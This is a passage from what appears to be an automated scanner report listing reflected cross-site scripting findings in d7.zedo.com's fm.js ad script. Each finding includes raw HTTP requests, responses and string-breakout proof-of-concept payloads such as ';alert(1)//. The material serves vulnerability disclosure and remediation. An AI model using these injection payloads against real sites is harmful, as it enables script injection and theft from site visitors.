Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d2/jsc/fm.js?c=e50f4'-alert(1)-'430b04548c0 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; ZFFAbh=749B826,20|1483_759#365; FFad=0:0:0:1:0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=414
Expires: Sat, 29 Jan 2011 23:29:14 GMT
Date: Sat, 29 Jan 2011 23:22:20 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d2;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d2/jsc/fm.js;qs=c=e50f4'-alert(1)-'430b04548c0;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(zz
...[SNIP]...

5.179. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d2/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb9ab'-alert(1)-'bacc7d9a398 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d2/jsc/fm.js?fb9ab'-alert(1)-'bacc7d9a398=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; ZFFAbh=749B826,20|1483_759#365; FFad=0:0:0:1:0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=416
Expires: Sat, 29 Jan 2011 23:29:14 GMT
Date: Sat, 29 Jan 2011 23:22:18 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d2;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d2/jsc/fm.js;qs=fb9ab'-alert(1)-'bacc7d9a398=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

5.180. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d2/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b9af'%3balert(1)//7005141fb0c was submitted in the q parameter. This input was echoed as 1b9af';alert(1)//7005141fb0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=1b9af'%3balert(1)//7005141fb0c&$=&s=123&z=0.2442760558333248 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; FFad=0:0:1:0:0; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
Vary: Accept-Encoding
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=255
Expires: Sat, 29 Jan 2011 23:22:44 GMT
Date: Sat, 29 Jan 2011 23:18:29 GMT
Connection: close
Content-Length: 2389

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='1b9af';alert(1)//7005141fb0c';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=1b9af';alert(1)//7005141fb0c;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

5.181. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d2/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3767"%3balert(1)//62e257b111a was submitted in the q parameter. This input was echoed as a3767";alert(1)//62e257b111a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=a3767"%3balert(1)//62e257b111a&$=&s=123&z=0.2442760558333248 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; FFad=0:0:1:0:0; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
Vary: Accept-Encoding
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=255
Expires: Sat, 29 Jan 2011 23:22:44 GMT
Date: Sat, 29 Jan 2011 23:18:29 GMT
Connection: close
Content-Length: 2375

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='a3767";alert(1)//62e257b111a';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=a3767";alert(1)//62e257b111a;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                   var zzStr = "s=123;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + M
...[SNIP]...

5.182. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b448'%3balert(1)//a06e2db3d7d was submitted in the $ parameter. This input was echoed as 7b448';alert(1)//a06e2db3d7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=&$=7b448'%3balert(1)//a06e2db3d7d&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1394:7b448';alert(1)//a06e2db3d7d;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=138
Expires: Sun, 30 Jan 2011 01:46:01 GMT
Date: Sun, 30 Jan 2011 01:43:43 GMT
Connection: close
Content-Length: 3404

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat=',7b448';alert(1)//a06e2db3d7d';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,7b448';alert(1)//a06e2db3d7d;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

5.183. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a54da"%3balert(1)//9ae9a9f14f3 was submitted in the $ parameter. This input was echoed as a54da";alert(1)//9ae9a9f14f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=&$=a54da"%3balert(1)//9ae9a9f14f3&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1394:a54da";alert(1)//9ae9a9f14f3;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=138
Expires: Sun, 30 Jan 2011 01:46:01 GMT
Date: Sun, 30 Jan 2011 01:43:43 GMT
Connection: close
Content-Length: 3404

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat=',a54da";alert(1)//9ae9a9f14f3';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,a54da";alert(1)//9ae9a9f14f3;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                   var zzStr = "s=2;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

5.184. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44b4e'%3balert(1)//c10e308a487 was submitted in the l parameter. This input was echoed as 44b4e';alert(1)//c10e308a487 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=&$=&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D44b4e'%3balert(1)//c10e308a487&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=137
Expires: Sun, 30 Jan 2011 01:46:01 GMT
Date: Sun, 30 Jan 2011 01:43:44 GMT
Connection: close
Content-Length: 3401

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
